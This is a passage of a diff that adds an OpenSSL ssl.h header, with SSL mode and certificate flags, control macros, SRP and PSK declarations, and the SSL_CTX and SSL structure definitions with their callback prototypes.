+ * Make it possible to retry SSL_write() with changed buffer location (buffer
+ * contents must stay the same!); this is not the default to avoid the
+ * misconception that non-blocking SSL_write() behaves like non-blocking
+ * write():
+ */
+# define SSL_MODE_ACCEPT_MOVING_WRITE_BUFFER 0x00000002L
+/*
+ * Never bother the application with retries if the transport is blocking:
+ */
+# define SSL_MODE_AUTO_RETRY 0x00000004L
+/* Don't attempt to automatically build certificate chain */
+# define SSL_MODE_NO_AUTO_CHAIN 0x00000008L
+/*
+ * Save RAM by releasing read and write buffers when they're empty. (SSL3 and
+ * TLS only.) "Released" buffers are put onto a free-list in the context or
+ * just freed (depending on the context's setting for freelist_max_len).
+ */
+# define SSL_MODE_RELEASE_BUFFERS 0x00000010L
+/*
+ * Send the current time in the Random fields of the ClientHello and
+ * ServerHello records for compatibility with hypothetical implementations
+ * that require it.
+ */
+# define SSL_MODE_SEND_CLIENTHELLO_TIME 0x00000020L
+# define SSL_MODE_SEND_SERVERHELLO_TIME 0x00000040L
+/*
+ * Send TLS_FALLBACK_SCSV in the ClientHello. To be set only by applications
+ * that reconnect with a downgraded protocol version; see
+ * draft-ietf-tls-downgrade-scsv-00 for details. DO NOT ENABLE THIS if your
+ * application attempts a normal handshake. Only use this in explicit
+ * fallback retries, following the guidance in
+ * draft-ietf-tls-downgrade-scsv-00.
+ */
+# define SSL_MODE_SEND_FALLBACK_SCSV 0x00000080L
+
+/* Cert related flags */
+/*
+ * Many implementations ignore some aspects of the TLS standards such as
+ * enforcing certifcate chain algorithms. When this is set we enforce them.
+ */
+# define SSL_CERT_FLAG_TLS_STRICT                0x00000001L
+
+/* Suite B modes, takes same values as certificate verify flags */
+# define SSL_CERT_FLAG_SUITEB_128_LOS_ONLY       0x10000
+/* Suite B 192 bit only mode */
+# define SSL_CERT_FLAG_SUITEB_192_LOS            0x20000
+/* Suite B 128 bit mode allowing 192 bit algorithms */
+# define SSL_CERT_FLAG_SUITEB_128_LOS            0x30000
+
+/* Perform all sorts of protocol violations for testing purposes */
+# define SSL_CERT_FLAG_BROKEN_PROTOCOL           0x10000000
+
+/* Flags for building certificate chains */
+/* Treat any existing certificates as untrusted CAs */
+# define SSL_BUILD_CHAIN_FLAG_UNTRUSTED          0x1
+/* Don't include root CA in chain */
+# define SSL_BUILD_CHAIN_FLAG_NO_ROOT            0x2
+/* Just check certificates already there */
+# define SSL_BUILD_CHAIN_FLAG_CHECK              0x4
+/* Ignore verification errors */
+# define SSL_BUILD_CHAIN_FLAG_IGNORE_ERROR       0x8
+/* Clear verification errors from queue */
+# define SSL_BUILD_CHAIN_FLAG_CLEAR_ERROR        0x10
+
+/* Flags returned by SSL_check_chain */
+/* Certificate can be used with this session */
+# define CERT_PKEY_VALID         0x1
+/* Certificate can also be used for signing */
+# define CERT_PKEY_SIGN          0x2
+/* EE certificate signing algorithm OK */
+# define CERT_PKEY_EE_SIGNATURE  0x10
+/* CA signature algorithms OK */
+# define CERT_PKEY_CA_SIGNATURE  0x20
+/* EE certificate parameters OK */
+# define CERT_PKEY_EE_PARAM      0x40
+/* CA certificate parameters OK */
+# define CERT_PKEY_CA_PARAM      0x80
+/* Signing explicitly allowed as opposed to SHA1 fallback */
+# define CERT_PKEY_EXPLICIT_SIGN 0x100
+/* Client CA issuer names match (always set for server cert) */
+# define CERT_PKEY_ISSUER_NAME   0x200
+/* Cert type matches client types (always set for server cert) */
+# define CERT_PKEY_CERT_TYPE     0x400
+/* Cert chain suitable to Suite B */
+# define CERT_PKEY_SUITEB        0x800
+
+# define SSL_CONF_FLAG_CMDLINE           0x1
+# define SSL_CONF_FLAG_FILE              0x2
+# define SSL_CONF_FLAG_CLIENT            0x4
+# define SSL_CONF_FLAG_SERVER            0x8
+# define SSL_CONF_FLAG_SHOW_ERRORS       0x10
+# define SSL_CONF_FLAG_CERTIFICATE       0x20
+/* Configuration value types */
+# define SSL_CONF_TYPE_UNKNOWN           0x0
+# define SSL_CONF_TYPE_STRING            0x1
+# define SSL_CONF_TYPE_FILE              0x2
+# define SSL_CONF_TYPE_DIR               0x3
+
+/*
+ * Note: SSL[_CTX]_set_{options,mode} use |= op on the previous value, they
+ * cannot be used to clear bits.
+ */
+
+# define SSL_CTX_set_options(ctx,op) \
+        SSL_CTX_ctrl((ctx),SSL_CTRL_OPTIONS,(op),NULL)
+# define SSL_CTX_clear_options(ctx,op) \
+        SSL_CTX_ctrl((ctx),SSL_CTRL_CLEAR_OPTIONS,(op),NULL)
+# define SSL_CTX_get_options(ctx) \
+        SSL_CTX_ctrl((ctx),SSL_CTRL_OPTIONS,0,NULL)
+# define SSL_set_options(ssl,op) \
+        SSL_ctrl((ssl),SSL_CTRL_OPTIONS,(op),NULL)
+# define SSL_clear_options(ssl,op) \
+        SSL_ctrl((ssl),SSL_CTRL_CLEAR_OPTIONS,(op),NULL)
+# define SSL_get_options(ssl) \
+        SSL_ctrl((ssl),SSL_CTRL_OPTIONS,0,NULL)
+
+# define SSL_CTX_set_mode(ctx,op) \
+        SSL_CTX_ctrl((ctx),SSL_CTRL_MODE,(op),NULL)
+# define SSL_CTX_clear_mode(ctx,op) \
+        SSL_CTX_ctrl((ctx),SSL_CTRL_CLEAR_MODE,(op),NULL)
+# define SSL_CTX_get_mode(ctx) \
+        SSL_CTX_ctrl((ctx),SSL_CTRL_MODE,0,NULL)
+# define SSL_clear_mode(ssl,op) \
+        SSL_ctrl((ssl),SSL_CTRL_CLEAR_MODE,(op),NULL)
+# define SSL_set_mode(ssl,op) \
+        SSL_ctrl((ssl),SSL_CTRL_MODE,(op),NULL)
+# define SSL_get_mode(ssl) \
+        SSL_ctrl((ssl),SSL_CTRL_MODE,0,NULL)
+# define SSL_set_mtu(ssl, mtu) \
+        SSL_ctrl((ssl),SSL_CTRL_SET_MTU,(mtu),NULL)
+# define DTLS_set_link_mtu(ssl, mtu) \
+        SSL_ctrl((ssl),DTLS_CTRL_SET_LINK_MTU,(mtu),NULL)
+# define DTLS_get_link_min_mtu(ssl) \
+        SSL_ctrl((ssl),DTLS_CTRL_GET_LINK_MIN_MTU,0,NULL)
+
+# define SSL_get_secure_renegotiation_support(ssl) \
+        SSL_ctrl((ssl), SSL_CTRL_GET_RI_SUPPORT, 0, NULL)
+
+# ifndef OPENSSL_NO_HEARTBEATS
+#  define SSL_heartbeat(ssl) \
+        SSL_ctrl((ssl),SSL_CTRL_TLS_EXT_SEND_HEARTBEAT,0,NULL)
+# endif
+
+# define SSL_CTX_set_cert_flags(ctx,op) \
+        SSL_CTX_ctrl((ctx),SSL_CTRL_CERT_FLAGS,(op),NULL)
+# define SSL_set_cert_flags(s,op) \
+        SSL_ctrl((s),SSL_CTRL_CERT_FLAGS,(op),NULL)
+# define SSL_CTX_clear_cert_flags(ctx,op) \
+        SSL_CTX_ctrl((ctx),SSL_CTRL_CLEAR_CERT_FLAGS,(op),NULL)
+# define SSL_clear_cert_flags(s,op) \
+        SSL_ctrl((s),SSL_CTRL_CLEAR_CERT_FLAGS,(op),NULL)
+
+void SSL_CTX_set_msg_callback(SSL_CTX *ctx,
+                              void (*cb) (int write_p, int version,
+                                          int content_type, const void *buf,
+                                          size_t len, SSL *ssl, void *arg));
+void SSL_set_msg_callback(SSL *ssl,
+                          void (*cb) (int write_p, int version,
+                                      int content_type, const void *buf,
+                                      size_t len, SSL *ssl, void *arg));
+# define SSL_CTX_set_msg_callback_arg(ctx, arg) SSL_CTX_ctrl((ctx), SSL_CTRL_SET_MSG_CALLBACK_ARG, 0, (arg))
+# define SSL_set_msg_callback_arg(ssl, arg) SSL_ctrl((ssl), SSL_CTRL_SET_MSG_CALLBACK_ARG, 0, (arg))
+
+# ifndef OPENSSL_NO_SRP
+
+#  ifndef OPENSSL_NO_SSL_INTERN
+
+typedef struct srp_ctx_st {
+    /* param for all the callbacks */
+    void *SRP_cb_arg;
+    /* set client Hello login callback */
+    int (*TLS_ext_srp_username_callback) (SSL *, int *, void *);
+    /* set SRP N/g param callback for verification */
+    int (*SRP_verify_param_callback) (SSL *, void *);
+    /* set SRP client passwd callback */
+    char *(*SRP_give_srp_client_pwd_callback) (SSL *, void *);
+    char *login;
+    BIGNUM *N, *g, *s, *B, *A;
+    BIGNUM *a, *b, *v;
+    char *info;
+    int strength;
+    unsigned long srp_Mask;
+} SRP_CTX;
+
+#  endif
+
+/* see tls_srp.c */
+int SSL_SRP_CTX_init(SSL *s);
+int SSL_CTX_SRP_CTX_init(SSL_CTX *ctx);
+int SSL_SRP_CTX_free(SSL *ctx);
+int SSL_CTX_SRP_CTX_free(SSL_CTX *ctx);
+int SSL_srp_server_param_with_username(SSL *s, int *ad);
+int SRP_generate_server_master_secret(SSL *s, unsigned char *master_key);
+int SRP_Calc_A_param(SSL *s);
+int SRP_generate_client_master_secret(SSL *s, unsigned char *master_key);
+
+# endif
+
+# if defined(OPENSSL_SYS_MSDOS) && !defined(OPENSSL_SYS_WIN32)
+#  define SSL_MAX_CERT_LIST_DEFAULT 1024*30
+                                          /* 30k max cert list :-) */
+# else
+#  define SSL_MAX_CERT_LIST_DEFAULT 1024*100
+                                           /* 100k max cert list :-) */
+# endif
+
+# define SSL_SESSION_CACHE_MAX_SIZE_DEFAULT      (1024*20)
+
+/*
+ * This callback type is used inside SSL_CTX, SSL, and in the functions that
+ * set them. It is used to override the generation of SSL/TLS session IDs in
+ * a server. Return value should be zero on an error, non-zero to proceed.
+ * Also, callbacks should themselves check if the id they generate is unique
+ * otherwise the SSL handshake will fail with an error - callbacks can do
+ * this using the 'ssl' value they're passed by;
+ * SSL_has_matching_session_id(ssl, id, *id_len) The length value passed in
+ * is set at the maximum size the session ID can be. In SSLv2 this is 16
+ * bytes, whereas SSLv3/TLSv1 it is 32 bytes. The callback can alter this
+ * length to be less if desired, but under SSLv2 session IDs are supposed to
+ * be fixed at 16 bytes so the id will be padded after the callback returns
+ * in this case. It is also an error for the callback to set the size to
+ * zero.
+ */
+typedef int (*GEN_SESSION_CB) (const SSL *ssl, unsigned char *id,
+                               unsigned int *id_len);
+
+typedef struct ssl_comp_st SSL_COMP;
+
+# ifndef OPENSSL_NO_SSL_INTERN
+
+struct ssl_comp_st {
+    int id;
+    const char *name;
+#  ifndef OPENSSL_NO_COMP
+    COMP_METHOD *method;
+#  else
+    char *method;
+#  endif
+};
+
+DECLARE_STACK_OF(SSL_COMP)
+DECLARE_LHASH_OF(SSL_SESSION);
+
+struct ssl_ctx_st {
+    const SSL_METHOD *method;
+    STACK_OF(SSL_CIPHER) *cipher_list;
+    /* same as above but sorted for lookup */
+    STACK_OF(SSL_CIPHER) *cipher_list_by_id;
+    struct x509_store_st /* X509_STORE */ *cert_store;
+    LHASH_OF(SSL_SESSION) *sessions;
+    /*
+     * Most session-ids that will be cached, default is
+     * SSL_SESSION_CACHE_MAX_SIZE_DEFAULT. 0 is unlimited.
+     */
+    unsigned long session_cache_size;
+    struct ssl_session_st *session_cache_head;
+    struct ssl_session_st *session_cache_tail;
+    /*
+     * This can have one of 2 values, ored together, SSL_SESS_CACHE_CLIENT,
+     * SSL_SESS_CACHE_SERVER, Default is SSL_SESSION_CACHE_SERVER, which
+     * means only SSL_accept which cache SSL_SESSIONS.
+     */
+    int session_cache_mode;
+    /*
+     * If timeout is not 0, it is the default timeout value set when
+     * SSL_new() is called.  This has been put in to make life easier to set
+     * things up
+     */
+    long session_timeout;
+    /*
+     * If this callback is not null, it will be called each time a session id
+     * is added to the cache.  If this function returns 1, it means that the
+     * callback will do a SSL_SESSION_free() when it has finished using it.
+     * Otherwise, on 0, it means the callback has finished with it. If
+     * remove_session_cb is not null, it will be called when a session-id is
+     * removed from the cache.  After the call, OpenSSL will
+     * SSL_SESSION_free() it.
+     */
+    int (*new_session_cb) (struct ssl_st *ssl, SSL_SESSION *sess);
+    void (*remove_session_cb) (struct ssl_ctx_st *ctx, SSL_SESSION *sess);
+    SSL_SESSION *(*get_session_cb) (struct ssl_st *ssl,
+                                    unsigned char *data, int len, int *copy);
+    struct {
+        int sess_connect;       /* SSL new conn - started */
+        int sess_connect_renegotiate; /* SSL reneg - requested */
+        int sess_connect_good;  /* SSL new conne/reneg - finished */
+        int sess_accept;        /* SSL new accept - started */
+        int sess_accept_renegotiate; /* SSL reneg - requested */
+        int sess_accept_good;   /* SSL accept/reneg - finished */
+        int sess_miss;          /* session lookup misses */
+        int sess_timeout;       /* reuse attempt on timeouted session */
+        int sess_cache_full;    /* session removed due to full cache */
+        int sess_hit;           /* session reuse actually done */
+        int sess_cb_hit;        /* session-id that was not in the cache was
+                                 * passed back via the callback.  This
+                                 * indicates that the application is
+                                 * supplying session-id's from other
+                                 * processes - spooky :-) */
+    } stats;
+
+    int references;
+
+    /* if defined, these override the X509_verify_cert() calls */
+    int (*app_verify_callback) (X509_STORE_CTX *, void *);
+    void *app_verify_arg;
+    /*
+     * before OpenSSL 0.9.7, 'app_verify_arg' was ignored
+     * ('app_verify_callback' was called with just one argument)
+     */
+
+    /* Default password callback. */
+    pem_password_cb *default_passwd_callback;
+
+    /* Default password callback user data. */
+    void *default_passwd_callback_userdata;
+
+    /* get client cert callback */
+    int (*client_cert_cb) (SSL *ssl, X509 **x509, EVP_PKEY **pkey);
+
+    /* cookie generate callback */
+    int (*app_gen_cookie_cb) (SSL *ssl, unsigned char *cookie,
+                              unsigned int *cookie_len);
+
+    /* verify cookie callback */
+    int (*app_verify_cookie_cb) (SSL *ssl, unsigned char *cookie,
+                                 unsigned int cookie_len);
+
+    CRYPTO_EX_DATA ex_data;
+
+    const EVP_MD *rsa_md5;      /* For SSLv2 - name is 'ssl2-md5' */
+    const EVP_MD *md5;          /* For SSLv3/TLSv1 'ssl3-md5' */
+    const EVP_MD *sha1;         /* For SSLv3/TLSv1 'ssl3->sha1' */
+
+    STACK_OF(X509) *extra_certs;
+    STACK_OF(SSL_COMP) *comp_methods; /* stack of SSL_COMP, SSLv3/TLSv1 */
+
+    /* Default values used when no per-SSL value is defined follow */
+
+    /* used if SSL's info_callback is NULL */
+    void (*info_callback) (const SSL *ssl, int type, int val);
+
+    /* what we put in client cert requests */
+    STACK_OF(X509_NAME) *client_CA;
+
+    /*
+     * Default values to use in SSL structures follow (these are copied by
+     * SSL_new)
+     */
+
+    unsigned long options;
+    unsigned long mode;
+    long max_cert_list;
+
+    struct cert_st /* CERT */ *cert;
+    int read_ahead;
+
+    /* callback that allows applications to peek at protocol messages */
+    void (*msg_callback) (int write_p, int version, int content_type,
+                          const void *buf, size_t len, SSL *ssl, void *arg);
+    void *msg_callback_arg;
+
+    int verify_mode;
+    unsigned int sid_ctx_length;
+    unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
+    /* called 'verify_callback' in the SSL */
+    int (*default_verify_callback) (int ok, X509_STORE_CTX *ctx);
+
+    /* Default generate session ID callback. */
+    GEN_SESSION_CB generate_session_id;
+
+    X509_VERIFY_PARAM *param;
+
+#  if 0
+    int purpose;                /* Purpose setting */
+    int trust;                  /* Trust setting */
+#  endif
+
+    int quiet_shutdown;
+
+    /*
+     * Maximum amount of data to send in one fragment. actual record size can
+     * be more than this due to padding and MAC overheads.
+     */
+    unsigned int max_send_fragment;
+
+#  ifndef OPENSSL_NO_ENGINE
+    /*
+     * Engine to pass requests for client certs to
+     */
+    ENGINE *client_cert_engine;
+#  endif
+
+#  ifndef OPENSSL_NO_TLSEXT
+    /* TLS extensions servername callback */
+    int (*tlsext_servername_callback) (SSL *, int *, void *);
+    void *tlsext_servername_arg;
+    /* RFC 4507 session ticket keys */
+    unsigned char tlsext_tick_key_name[16];
+    unsigned char tlsext_tick_hmac_key[16];
+    unsigned char tlsext_tick_aes_key[16];
+    /* Callback to support customisation of ticket key setting */
+    int (*tlsext_ticket_key_cb) (SSL *ssl,
+                                 unsigned char *name, unsigned char *iv,
+                                 EVP_CIPHER_CTX *ectx,
+                                 HMAC_CTX *hctx, int enc);
+
+    /* certificate status request info */
+    /* Callback for status request */
+    int (*tlsext_status_cb) (SSL *ssl, void *arg);
+    void *tlsext_status_arg;
+
+    /* draft-rescorla-tls-opaque-prf-input-00.txt information */
+    int (*tlsext_opaque_prf_input_callback) (SSL *, void *peerinput,
+                                             size_t len, void *arg);
+    void *tlsext_opaque_prf_input_callback_arg;
+#  endif
+
+#  ifndef OPENSSL_NO_PSK
+    char *psk_identity_hint;
+    unsigned int (*psk_client_callback) (SSL *ssl, const char *hint,
+                                         char *identity,
+                                         unsigned int max_identity_len,
+                                         unsigned char *psk,
+                                         unsigned int max_psk_len);
+    unsigned int (*psk_server_callback) (SSL *ssl, const char *identity,
+                                         unsigned char *psk,
+                                         unsigned int max_psk_len);
+#  endif
+
+#  ifndef OPENSSL_NO_BUF_FREELISTS
+#   define SSL_MAX_BUF_FREELIST_LEN_DEFAULT 32
+    unsigned int freelist_max_len;
+    struct ssl3_buf_freelist_st *wbuf_freelist;
+    struct ssl3_buf_freelist_st *rbuf_freelist;
+#  endif
+#  ifndef OPENSSL_NO_SRP
+    SRP_CTX srp_ctx;            /* ctx for SRP authentication */
+#  endif
+
+#  ifndef OPENSSL_NO_TLSEXT
+
+#   ifndef OPENSSL_NO_NEXTPROTONEG
+    /* Next protocol negotiation information */
+    /* (for experimental NPN extension). */
+
+    /*
+     * For a server, this contains a callback function by which the set of
+     * advertised protocols can be provided.
+     */
+    int (*next_protos_advertised_cb) (SSL *s, const unsigned char **buf,
+                                      unsigned int *len, void *arg);
+    void *next_protos_advertised_cb_arg;
+    /*
+     * For a client, this contains a callback function that selects the next
+     * protocol from the list provided by the server.
+     */
+    int (*next_proto_select_cb) (SSL *s, unsigned char **out,
+                                 unsigned char *outlen,
+                                 const unsigned char *in,
+                                 unsigned int inlen, void *arg);
+    void *next_proto_select_cb_arg;
+#   endif
+    /* SRTP profiles we are willing to do from RFC 5764 */
+    STACK_OF(SRTP_PROTECTION_PROFILE) *srtp_profiles;
+
+    /*
+     * ALPN information (we are in the process of transitioning from NPN to
+     * ALPN.)
+     */
+
+    /*-
+     * For a server, this contains a callback function that allows the
+     * server to select the protocol for the connection.
+     *   out: on successful return, this must point to the raw protocol
+     *        name (without the length prefix).
+     *   outlen: on successful return, this contains the length of |*out|.
+     *   in: points to the client's list of supported protocols in
+     *       wire-format.
+     *   inlen: the length of |in|.
+     */
+    int (*alpn_select_cb) (SSL *s,
+                           const unsigned char **out,
+                           unsigned char *outlen,
+                           const unsigned char *in,
+                           unsigned int inlen, void *arg);
+    void *alpn_select_cb_arg;
+
+    /*
+     * For a client, this contains the list of supported protocols in wire
+     * format.
+     */
+    unsigned char *alpn_client_proto_list;
+    unsigned alpn_client_proto_list_len;
+
+#   ifndef OPENSSL_NO_EC
+    /* EC extension values inherited by SSL structure */
+    size_t tlsext_ecpointformatlist_length;
+    unsigned char *tlsext_ecpointformatlist;
+    size_t tlsext_ellipticcurvelist_length;
+    unsigned char *tlsext_ellipticcurvelist;
+#   endif                       /* OPENSSL_NO_EC */
+#  endif
+};
+
+# endif
+
+# define SSL_SESS_CACHE_OFF                      0x0000
+# define SSL_SESS_CACHE_CLIENT                   0x0001
+# define SSL_SESS_CACHE_SERVER                   0x0002
+# define SSL_SESS_CACHE_BOTH     (SSL_SESS_CACHE_CLIENT|SSL_SESS_CACHE_SERVER)
+# define SSL_SESS_CACHE_NO_AUTO_CLEAR            0x0080
+/* enough comments already ... see SSL_CTX_set_session_cache_mode(3) */
+# define SSL_SESS_CACHE_NO_INTERNAL_LOOKUP       0x0100
+# define SSL_SESS_CACHE_NO_INTERNAL_STORE        0x0200
+# define SSL_SESS_CACHE_NO_INTERNAL \
+        (SSL_SESS_CACHE_NO_INTERNAL_LOOKUP|SSL_SESS_CACHE_NO_INTERNAL_STORE)
+
+LHASH_OF(SSL_SESSION) *SSL_CTX_sessions(SSL_CTX *ctx);
+# define SSL_CTX_sess_number(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_NUMBER,0,NULL)
+# define SSL_CTX_sess_connect(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CONNECT,0,NULL)
+# define SSL_CTX_sess_connect_good(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CONNECT_GOOD,0,NULL)
+# define SSL_CTX_sess_connect_renegotiate(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CONNECT_RENEGOTIATE,0,NULL)
+# define SSL_CTX_sess_accept(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_ACCEPT,0,NULL)
+# define SSL_CTX_sess_accept_renegotiate(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_ACCEPT_RENEGOTIATE,0,NULL)
+# define SSL_CTX_sess_accept_good(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_ACCEPT_GOOD,0,NULL)
+# define SSL_CTX_sess_hits(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_HIT,0,NULL)
+# define SSL_CTX_sess_cb_hits(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CB_HIT,0,NULL)
+# define SSL_CTX_sess_misses(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_MISSES,0,NULL)
+# define SSL_CTX_sess_timeouts(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_TIMEOUTS,0,NULL)
+# define SSL_CTX_sess_cache_full(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CACHE_FULL,0,NULL)
+
+void SSL_CTX_sess_set_new_cb(SSL_CTX *ctx,
+                             int (*new_session_cb) (struct ssl_st *ssl,
+                                                    SSL_SESSION *sess));
+int (*SSL_CTX_sess_get_new_cb(SSL_CTX *ctx)) (struct ssl_st *ssl,
+                                              SSL_SESSION *sess);
+void SSL_CTX_sess_set_remove_cb(SSL_CTX *ctx,
+                                void (*remove_session_cb) (struct ssl_ctx_st
+                                                           *ctx,
+                                                           SSL_SESSION
+                                                           *sess));
+void (*SSL_CTX_sess_get_remove_cb(SSL_CTX *ctx)) (struct ssl_ctx_st *ctx,
+                                                  SSL_SESSION *sess);
+void SSL_CTX_sess_set_get_cb(SSL_CTX *ctx,
+                             SSL_SESSION *(*get_session_cb) (struct ssl_st
+                                                             *ssl,
+                                                             unsigned char
+                                                             *data, int len,
+                                                             int *copy));
+SSL_SESSION *(*SSL_CTX_sess_get_get_cb(SSL_CTX *ctx)) (struct ssl_st *ssl,
+                                                       unsigned char *Data,
+                                                       int len, int *copy);
+void SSL_CTX_set_info_callback(SSL_CTX *ctx,
+                               void (*cb) (const SSL *ssl, int type,
+                                           int val));
+void (*SSL_CTX_get_info_callback(SSL_CTX *ctx)) (const SSL *ssl, int type,
+                                                 int val);
+void SSL_CTX_set_client_cert_cb(SSL_CTX *ctx,
+                                int (*client_cert_cb) (SSL *ssl, X509 **x509,
+                                                       EVP_PKEY **pkey));
+int (*SSL_CTX_get_client_cert_cb(SSL_CTX *ctx)) (SSL *ssl, X509 **x509,
+                                                 EVP_PKEY **pkey);
+# ifndef OPENSSL_NO_ENGINE
+int SSL_CTX_set_client_cert_engine(SSL_CTX *ctx, ENGINE *e);
+# endif
+void SSL_CTX_set_cookie_generate_cb(SSL_CTX *ctx,
+                                    int (*app_gen_cookie_cb) (SSL *ssl,
+                                                              unsigned char
+                                                              *cookie,
+                                                              unsigned int
+                                                              *cookie_len));
+void SSL_CTX_set_cookie_verify_cb(SSL_CTX *ctx,
+                                  int (*app_verify_cookie_cb) (SSL *ssl,
+                                                               unsigned char
+                                                               *cookie,
+                                                               unsigned int
+                                                               cookie_len));
+# ifndef OPENSSL_NO_NEXTPROTONEG
+void SSL_CTX_set_next_protos_advertised_cb(SSL_CTX *s,
+                                           int (*cb) (SSL *ssl,
+                                                      const unsigned char
+                                                      **out,
+                                                      unsigned int *outlen,
+                                                      void *arg), void *arg);
+void SSL_CTX_set_next_proto_select_cb(SSL_CTX *s,
+                                      int (*cb) (SSL *ssl,
+                                                 unsigned char **out,
+                                                 unsigned char *outlen,
+                                                 const unsigned char *in,
+                                                 unsigned int inlen,
+                                                 void *arg), void *arg);
+void SSL_get0_next_proto_negotiated(const SSL *s, const unsigned char **data,
+                                    unsigned *len);
+# endif
+
+# ifndef OPENSSL_NO_TLSEXT
+int SSL_select_next_proto(unsigned char **out, unsigned char *outlen,
+                          const unsigned char *in, unsigned int inlen,
+                          const unsigned char *client,
+                          unsigned int client_len);
+# endif
+
+# define OPENSSL_NPN_UNSUPPORTED 0
+# define OPENSSL_NPN_NEGOTIATED  1
+# define OPENSSL_NPN_NO_OVERLAP  2
+
+int SSL_CTX_set_alpn_protos(SSL_CTX *ctx, const unsigned char *protos,
+                            unsigned protos_len);
+int SSL_set_alpn_protos(SSL *ssl, const unsigned char *protos,
+                        unsigned protos_len);
+void SSL_CTX_set_alpn_select_cb(SSL_CTX *ctx,
+                                int (*cb) (SSL *ssl,
+                                           const unsigned char **out,
+                                           unsigned char *outlen,
+                                           const unsigned char *in,
+                                           unsigned int inlen,
+                                           void *arg), void *arg);
+void SSL_get0_alpn_selected(const SSL *ssl, const unsigned char **data,
+                            unsigned *len);
+
+# ifndef OPENSSL_NO_PSK
+/*
+ * the maximum length of the buffer given to callbacks containing the
+ * resulting identity/psk
+ */
+#  define PSK_MAX_IDENTITY_LEN 128
+#  define PSK_MAX_PSK_LEN 256
+void SSL_CTX_set_psk_client_callback(SSL_CTX *ctx,
+                                     unsigned int (*psk_client_callback) (SSL
+                                                                          *ssl,
+                                                                          const
+                                                                          char
+                                                                          *hint,
+                                                                          char
+                                                                          *identity,
+                                                                          unsigned
+                                                                          int
+                                                                          max_identity_len,
+                                                                          unsigned
+                                                                          char
+                                                                          *psk,
+                                                                          unsigned
+                                                                          int
+                                                                          max_psk_len));
+void SSL_set_psk_client_callback(SSL *ssl,
+                                 unsigned int (*psk_client_callback) (SSL
+                                                                      *ssl,
+                                                                      const
+                                                                      char
+                                                                      *hint,
+                                                                      char
+                                                                      *identity,
+                                                                      unsigned
+                                                                      int
+                                                                      max_identity_len,
+                                                                      unsigned
+                                                                      char
+                                                                      *psk,
+                                                                      unsigned
+                                                                      int
+                                                                      max_psk_len));
+void SSL_CTX_set_psk_server_callback(SSL_CTX *ctx,
+                                     unsigned int (*psk_server_callback) (SSL
+                                                                          *ssl,
+                                                                          const
+                                                                          char
+                                                                          *identity,
+                                                                          unsigned
+                                                                          char
+                                                                          *psk,
+                                                                          unsigned
+                                                                          int
+                                                                          max_psk_len));
+void SSL_set_psk_server_callback(SSL *ssl,
+                                 unsigned int (*psk_server_callback) (SSL
+                                                                      *ssl,
+                                                                      const
+                                                                      char
+                                                                      *identity,
+                                                                      unsigned
+                                                                      char
+                                                                      *psk,
+                                                                      unsigned
+                                                                      int
+                                                                      max_psk_len));
+int SSL_CTX_use_psk_identity_hint(SSL_CTX *ctx, const char *identity_hint);
+int SSL_use_psk_identity_hint(SSL *s, const char *identity_hint);
+const char *SSL_get_psk_identity_hint(const SSL *s);
+const char *SSL_get_psk_identity(const SSL *s);
+# endif
+
+# ifndef OPENSSL_NO_TLSEXT
+/* Register callbacks to handle custom TLS Extensions for client or server. */
+
+int SSL_CTX_add_client_custom_ext(SSL_CTX *ctx, unsigned int ext_type,
+                                  custom_ext_add_cb add_cb,
+                                  custom_ext_free_cb free_cb,
+                                  void *add_arg,
+                                  custom_ext_parse_cb parse_cb,
+                                  void *parse_arg);
+
+int SSL_CTX_add_server_custom_ext(SSL_CTX *ctx, unsigned int ext_type,
+                                  custom_ext_add_cb add_cb,
+                                  custom_ext_free_cb free_cb,
+                                  void *add_arg,
+                                  custom_ext_parse_cb parse_cb,
+                                  void *parse_arg);
+
+int SSL_extension_supported(unsigned int ext_type);
+
+# endif
+
+# define SSL_NOTHING     1
+# define SSL_WRITING     2
+# define SSL_READING     3
+# define SSL_X509_LOOKUP 4
+
+/* These will only be used when doing non-blocking IO */
+# define SSL_want_nothing(s)     (SSL_want(s) == SSL_NOTHING)
+# define SSL_want_read(s)        (SSL_want(s) == SSL_READING)
+# define SSL_want_write(s)       (SSL_want(s) == SSL_WRITING)
+# define SSL_want_x509_lookup(s) (SSL_want(s) == SSL_X509_LOOKUP)
+
+# define SSL_MAC_FLAG_READ_MAC_STREAM 1
+# define SSL_MAC_FLAG_WRITE_MAC_STREAM 2
+
+# ifndef OPENSSL_NO_SSL_INTERN
+
+struct ssl_st {
+    /*
+     * protocol version (one of SSL2_VERSION, SSL3_VERSION, TLS1_VERSION,
+     * DTLS1_VERSION)
+     */
+    int version;
+    /* SSL_ST_CONNECT or SSL_ST_ACCEPT */
+    int type;
+    /* SSLv3 */
+    const SSL_METHOD *method;
+    /*
+     * There are 2 BIO's even though they are normally both the same.  This
+     * is so data can be read and written to different handlers
+     */
+#  ifndef OPENSSL_NO_BIO
+    /* used by SSL_read */
+    BIO *rbio;
+    /* used by SSL_write */
+    BIO *wbio;
+    /* used during session-id reuse to concatenate messages */
+    BIO *bbio;
+#  else
+    /* used by SSL_read */
+    char *rbio;
+    /* used by SSL_write */
+    char *wbio;
+    char *bbio;
+#  endif
+    /*
+     * This holds a variable that indicates what we were doing when a 0 or -1
+     * is returned.  This is needed for non-blocking IO so we know what
+     * request needs re-doing when in SSL_accept or SSL_connect
+     */
+    int rwstate;
+    /* true when we are actually in SSL_accept() or SSL_connect() */
+    int in_handshake;
+    int (*handshake_func) (SSL *);
+    /*
+     * Imagine that here's a boolean member "init" that is switched as soon
+     * as SSL_set_{accept/connect}_state is called for the first time, so
+     * that "state" and "handshake_func" are properly initialized.  But as
+     * handshake_func is == 0 until then, we use this test instead of an
+     * "init" member.
+     */
+    /* are we the server side? - mostly used by SSL_clear */
